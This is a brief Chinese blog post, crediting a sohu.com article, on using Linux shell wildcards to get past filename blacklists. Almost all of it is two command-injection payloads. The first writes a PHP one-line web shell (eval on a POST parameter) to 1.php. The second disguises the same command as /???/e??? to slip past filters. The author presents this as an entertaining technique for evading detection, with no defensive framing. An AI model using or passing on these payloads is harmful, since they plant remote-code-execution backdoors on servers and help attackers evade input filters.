Linux通配符绕过文件名黑名单

发表于 | 更新于: | 分类于 | | 阅读次数:
字数统计: 74 | 阅读时长 ≈ 1

文章来源:
http://www.sohu.com/a/235200861_658302

通配符绕过黑名单,做免杀还是蛮有意思的,先做记录

1.原本的payload

cmd=/bin/echo "<?php eval($_POST['cmd'])?>" > 1.php

2.变形后的payload:

cmd=/???/e??? "<?php eval($_POST['cmd'])?>" > 1.php

-------------本文结束❤感谢阅读-------------